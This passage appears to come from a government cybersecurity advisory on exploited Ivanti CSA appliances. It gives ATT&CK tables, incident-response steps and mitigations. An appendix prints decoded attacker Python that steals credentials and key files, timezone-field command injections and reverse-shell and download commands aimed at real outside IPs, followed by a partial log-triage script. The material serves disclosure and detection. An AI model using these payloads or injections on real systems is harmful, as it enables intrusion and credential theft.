Command and Scripting Interpreter T1059 Threat actors abused command and script interpreters to execute commands, scripts, or binaries.
Table 7: Persistence
Technique Title ID Use
Modify Authentication Process T1556 Threat actors executed an authentication bypass by exploiting the authentication mechanisms of a device to gain access to organizations’ networks.
Server Software Component: Web Shell T1505.003 Threat actors executed code to implant webshells for persistence.
Table 8: Privilege Escalation
Technique Title ID Use
Exploitation for Privilege Escalation T1068 Threat actors leveraged weaknesses to gain access via an outdated, vulnerable version of a server.
Table 9: Defense Evasion
Technique Title ID Use
Hide Artifacts: Hidden Users T1564.002 Threat actors acted as a hidden user to disguise their presence on a system.
Deobfuscate/Decode Files or Information T1140 Threat actors decrypted credentials prior to exfiltration by leveraging native tools located in the extracted backup file.
Abuse Elevation Control Mechanism: Sudo and Sudo Caching T1548.003 Threat actors used sudo commands to disable vulnerabilities, modify and remove webshells, and remove evidence of exploitation.
Table 10: Credential Access
Technique Title ID Use
Unsecured Credentials: Credentials in Files T1552.001 Threat actors harvested encrypted admin credentials to gain further access.
Table 11: Lateral Movement
Technique Title ID Use
Exploitation of Remote Services T1210 Threat actors exploited CSAs via remote services to gain access to an organization's networks by leveraging programming errors, EOL systems, and operating systems.
Table 12: Command and Control
Technique Title ID Use
Remote Access Software T1219 Threat actors attempted to remotely authenticate into a victim’s network and execute arbitrary commands on the appliance.
Application Layer: Web Protocol T1071.001 Threat actors used tools such as GET or POST requests to acquire session and CSRF tokens.
Table 13: Exfiltration
Technique Title ID Use
Exfiltration TA0010 Threat actors exfiltrated encrypted admin credentials or other encrypted data for future use.

Incident Response

If compromise is detected, the authoring agencies recommend that organizations:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Provision new account credentials.
  4. For Ivanti hosts with Active Directory (AD) access, assume that threat actors exported active domain administrator credentials during the initial compromise, since they can do so trivially. Until there is evidence to the contrary, assume that the compromised system's AD access extends to the external authentication systems it connects to, such as Lightweight Directory Access Protocol (LDAP) and AD.
  5. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
    Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.
  6. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

Mitigations

CISA and FBI recommend organizations: 

  • Upgrade to the latest supported version of Ivanti CSA immediately for continued support.[3] Please note that Ivanti CSA 4.6 is EOL and no longer receives patches or third-party libraries. Customers must upgrade to the latest version of the product for continued support.
  • Install endpoint detection and response (EDR) on the system to alert network defenders on unusual and potentially malicious activity.
  • Establish a baseline and maintain detailed logs of network traffic, account behavior, and software. This can assist network defenders in identifying anomalies that may indicate malicious activity more quickly.
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Secure remote access tools by:
    • Implementing application controls to manage and control software execution, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
    • Strictly limiting the use of remote desktop protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
      • Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
  • Follow best cybersecurity practices in your production and enterprise environments, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA's Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures. Because the CPGs are a subset of best practices, CISA and FBI also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).

Validate Security Controls

In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 4 through Table 13).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Contact Information

Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to:

  • CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.

Version History

January 22, 2025: Initial version.

Appendix A: Encoded and Decoded Scripts

Decoded Python Scripts

{
# Decoded payload delivered through the DateTimeTab.php 'timezone' command injection.
# It runs on the CSA appliance and uses the appliance's own PostgreSQL database as a
# covert output channel: results are written into the "organization" column of the
# admin row, where they can be read back through the web UI, and then wiped.
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
    # Store "AA<type>:<base64 message>BB" in admin's organization field; no type/message clears it.
    if t and m:
        msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
    else:
        msg = ''
    os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
# Newest file in /backups: the appliance's configuration backup archive.
try:
    r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
    r = None
# The gsbadmin database password is read straight from the broker configuration file.
with open("/opt/landesk/broker/broker.conf") as f:
    dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
    # Colon-separated stored credential record for admin; fields 1, 4, 5 and 6 are used below.
    p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
    os.system("tar zxvf {}".format(r))
    # Poll /tmp for a file named php + six characters (the name PHP gives the temporary
    # file of a multipart upload), i.e. a helper binary uploaded in a separate request,
    # then run it against the credential fields and root/.certs/<field 1>.key from the archive.
    while True:
        for f in os.listdir('.'):
            if re.match("php\w{6}", f):
                os.chmod(f, 0o777)
                m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
                if m:
                    set_msg(dbpwd, "PASSWORD", m)   # publish the result
                    time.sleep(30)                   # leave it readable for 30 seconds
                    set_msg(dbpwd)                   # then clear the field
                    exit()
else:
    set_msg(dbpwd, 'ERROR', 'NO BACKUP')
}
{
# Variant of the script above that targets the 'service' account's stored credential
# instead of admin's and uses that account's organization field as the output channel.
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
   if t and m:
       msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ''
   os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='service'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open("/opt/landesk/broker/broker.conf") as f:
   dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
   p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'service\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
   os.system("tar zxvf {}".format(r))
   while True:
       for f in os.listdir('.'):
           if re.match("php\w{6}", f):
               os.chmod(f, 0o777)
               m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
               if m:
                   set_msg(dbpwd, "PASSWORD", m)
                   time.sleep(30)
                   set_msg(dbpwd)
                   exit()
else:
   set_msg(dbpwd, 'ERROR', 'NO BACKUP')
}

{
# Variant that needs no helper binary: it publishes the admin credential record together
# with the base64 of root/.certs/<field 1>.key, and every write also resets the admin
# account's lockout counters (lockoutalert=0, attempts=0).
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
   if t and m:
       msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ''
   os.system('''export PGPASSWORD={};echo "update user_info set organization='{}',lockoutalert=0,attempts=0 where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))

with open("/opt/landesk/broker/broker.conf") as f:
   dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]

   p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip()
   v = p.split(':')
   # 'base 64' (with the space) is as decoded; the relative key path assumes the backup archive was already extracted into /tmp.
   k = os.popen('base 64 -w0 root/.certs/{}.key'.format(v[1])).read()
   set_msg(dbpwd, "PASSWORD", p+'||'+k)
   time.sleep(30)
   set_msg(dbpwd)
}

{
# Variant that first deletes every user_info row whose runas is 'Nobody', resets lockoutalert
# on each write, and single-quotes the credential fields passed to the helper binary.
import os, re, base64, time

def set_msg(p, t='', m=''):
   if t and m:
       msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ''
   os.system('''export PGPASSWORD={};echo "update user_info set organization='{}',lockoutalert=0 where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))

os.chdir("/tmp")
d = "/backups"
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open("/opt/landesk/broker/broker.conf") as f:
   dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
   os.system('''export PGPASSWORD={};echo "delete from user_info where runas='Nobody'"|psql -d brokerdb -U gsbadmin'''.format(dbpwd))
   if r:
       p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
       os.system("tar zxvf {}".format(r))
       while True:
           for f in os.listdir('.'):
               if re.match("php\w{6}", f):
                   os.chmod(f, 0o777)
                   m = os.popen("./{} '{}' '{}' '{}' root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
                   if m:
                       set_msg(dbpwd, "PASSWORD", m)
                       time.sleep(30)
                       set_msg(dbpwd)
                       exit()
   else:
       set_msg(dbpwd, 'ERROR', 'NO BACKUP')
}

{
# Like the previous variant (deletes user_info rows with runas='Nobody') but without the
# lockoutalert reset and without quoting the helper binary's arguments.
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
   if t and m:
       msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ''
   os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open("/opt/landesk/broker/broker.conf") as f:
   dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
   os.system('''export PGPASSWORD={};echo "delete from user_info where runas='Nobody'"|psql -d brokerdb -U gsbadmin'''.format(dbpwd))
if r:
   p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
   os.system("tar zxvf {}".format(r))
   while True:
       for f in os.listdir('.'):
           if re.match("php\w{6}", f):
               os.chmod(f, 0o777)
               m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
               if m:
                   set_msg(dbpwd, "PASSWORD", m)
                   time.sleep(30)
                   set_msg(dbpwd)
                   exit()
else:
   set_msg(dbpwd, 'ERROR', 'NO BACKUP')
}

Decoded datetime.php 'timezone' Exploit base64 Scripts

{
Sep  5 01:09:59 REDACTED gsb[996]: /etc/php.ini
rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo 
"update user_info set organization='||/usr/bin/echo import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("php\w{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')
| /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;' (1)
}
{
Sep  5 01:47:01 REDACTED gsb[2599]: /etc/php.ini
rewritten with new timezone: ';/usr/bin/echo 
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("php\w{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')  
| /usr/bin/base64 -d | python;' (1)
}
{
Sep  5 02:14:08 REDACTED gsb[1273]: /etc/php.ini
rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo 
"update user_info set organization='||/usr/bin/echo import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("php\w{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')
| /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;' (1)
}
{
Sep  5 22:22:06 REDACTED gsb[9367]: /etc/php.ini
rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo 
"update user_info set organization='||/usr/bin/echo import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("php\w{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')
| /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;' (1)
}
{
Sep  6 02:39:11 REDACTED gsb[21266]: /etc/php.ini
rewritten with new timezone: ';/usr/bin/echo 
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("php\w{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')  
| /usr/bin/base64 -d | python;' (1)
}
{
Sep  6 03:03:44 REDACTED gsb[11427]: /etc/php.ini
rewritten with new timezone: ';bash /tmp/Xa27efd2.tmp;' (1)
}
{
Sep  8 05:18:35 REDACTED gsb[5132]: /etc/php.ini
rewritten with new timezone: ';/sbin/backuptool --backup;' (1)
}
{
Sep  8 05:19:34 REDACTED gsb[5325]: /etc/php.ini
rewritten with new timezone: ';/usr/bin/echo 
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("php\w{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')   
| /usr/bin/base64 -d | python;' (1)
}
{
Sep  8 10:37:35 REDACTED gsb[6196]: /etc/php.ini
rewritten with new timezone: ';nc REDACTED 80 -ssl -e /bin/bash;' (1)
}
{
Sep  8 10:40:38 REDACTED gsb[8758]: /etc/php.ini
rewritten with new timezone: ';curl https://gggg.oyr2ohrm.eyes.sh/;' (1)
}
{
Sep  8 10:41:35 REDACTED gsb[7475]: /etc/php.ini
rewritten with new timezone: ';curl 98.98.54.209/a.sh -o /dev/shm/a.sh;' (1)
}
{
Sep  8 13:10:37 REDACTED gsb[22555]: /etc/php.ini
rewritten with new timezone: ';nc REDACTED 80 --ssl -e /bin/bash;' (1)
}
{
Sep  8 13:21:06 REDACTED gsb[24954]: /etc/php.ini
rewritten with new timezone: ';nc REDACTED 80 --ssl -e /bin/bash;' (1)
}
{
Sep  8 20:23:14 REDACTED gsb[1899]: /etc/php.ini
rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo 
"update user_info set organization='||/usr/bin/echo import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("php\w{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')   
| /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;' (1)
}
{
Sep 10 04:36:30 REDACTED gsb[16012]: /etc/php.ini
rewritten with new timezone: ';/usr/bin/echo 
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("45.33.101.53",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'== | /usr/bin/base64 -d | /bin/bash;' (1)
}
{
Sep 10 11:48:32 csa gsb[6829]: /etc/php.ini
rewritten with new timezone: ';/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("156.234.193.18",44345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);';' (1)
}
{
Sep 10 05:33:42 REDACTED gsb[17292]: /etc/php.ini
rewritten with new timezone: ';/usr/bin/echo 
import os, re, time
os.chdir("/tmp")
d = "/backups/backup-09-01-2024_010101.tar.gz"
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if os.path.exists(d):
  os.system("tar zxf {}".format(d))
  pwd = os.popen("export PGPASSWORD={};echo SELECT username,passwd FROM user_info | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().strip()
  p = pwd.split(':')
  k = os.popen("cat root/.certs/{}.0".format(p[1])).read().strip()
  os.system('''export PGPASSWORD={};echo "INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (1, '{}', '1', '{}', '2024-03-13 05:10:16.926012')"|psql -d brokerdb -U gsbadmin'''.format(dbpwd, k[0:200], k[200:700]))
  os.system('''export PGPASSWORD={};echo "INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (2, '{}', '2', '{}', '2024-03-13 05:10:16.926012')"|psql -d brokerdb -U gsbadmin'''.format(dbpwd, k[700:900], k[900:]))
  os.system('''export PGPASSWORD={};echo "INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (3, '{}', '3', '{}', '2024-03-13 05:10:16.926012')"|psql -d brokerdb -U gsbadmin'''.format(dbpwd, pwd[0:200], pwd[200:700]))
  time.sleep(60)
  os.system('''export PGPASSWORD={};echo "DELETE FROM blockedcerts"|psql -d brokerdb -U gsbadmin'''.format(dbpwd))
  os.system("rm -rdf *;rm -rf *")== | /usr/bin/base64 -d | python;' (1)
}
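Every entry above comes from one log source: the appliance writes the value it just placed in /etc/php.ini to syslog, so a quoted timezone that opens with a semicolon and carries a shell pipeline is direct evidence of the injection, and the base64 stages can be decoded from the log alone. The following Python triage is an added example and is not part of the advisory. It runs over constructed sample lines (host name, PIDs, the benign zone, the base64 stage and all addresses are made up; the command shapes mirror the logged ones), extracts the injected value, skips anything that is a plain Area/Location zone name, decodes an `echo <base64> | base64 -d | <interpreter>` stage, and attaches addresses and a coarse technique tag. It assumes one syslog line per event; the multi-line layout above is the advisory's wrapping, not the log format.

```python
import base64
import re

# Constructed sample syslog lines, modelled on the "gsb[...]: /etc/php.ini rewritten
# with new timezone" entries above. Host name, PIDs, the benign zone, the base64 stage
# and all addresses (RFC 5737 documentation ranges) are made up; the command shapes
# (nc reverse shell, curl download, echo <b64> | base64 -d | interpreter) mirror the
# logged ones.
_STAGED = base64.b64encode(b"curl http://203.0.113.44:8443/x.sh | sh").decode()
SAMPLE_LOG = "\n".join([
    "Sep  4 23:58:01 csa gsb[811]: /etc/php.ini rewritten with new timezone: 'America/Denver' (1)",
    "Sep  8 10:37:35 csa gsb[6196]: /etc/php.ini rewritten with new timezone: "
    "';nc 203.0.113.10 80 --ssl -e /bin/bash;' (1)",
    "Sep  8 10:41:35 csa gsb[7475]: /etc/php.ini rewritten with new timezone: "
    "';curl 198.51.100.7/a.sh -o /dev/shm/a.sh;' (1)",
    "Sep 10 04:36:30 csa gsb[16012]: /etc/php.ini rewritten with new timezone: "
    "';/usr/bin/echo " + _STAGED + " | /usr/bin/base64 -d | /bin/bash;' (1)",
])

EVENT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) gsb\[(?P<pid>\d+)\]: "
    r"/etc/php\.ini rewritten with new timezone: '(?P<tz>.*)' \(\d+\)\s*$"
)
# A real zone name is Area/Location (at most three components) and nothing else.
VALID_TZ = re.compile(r"^[A-Za-z_][A-Za-z0-9_+\-]*(?:/[A-Za-z0-9_+\-]+){0,2}$")
SHELL_META = re.compile(r"[;|&`]|\$\(")
# echo <base64> | base64 -d | <interpreter>: the staging idiom seen in the log above.
B64_PIPE = re.compile(
    r"echo\s+(?P<b64>[A-Za-z0-9+/]{8,}={0,2})\s*\|\s*(?:/usr/bin/)?base64\s+-d\s*\|\s*(?P<interp>[^\s;]+)"
)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"https?://[^\s'\";|]+")
TAGS = {
    "reverse_shell": re.compile(r"\bnc\b.*\s-e\s|socket\.connect|/bin/(?:ba)?sh\s+-i\b"),
    "download": re.compile(r"\b(?:curl|wget)\b"),
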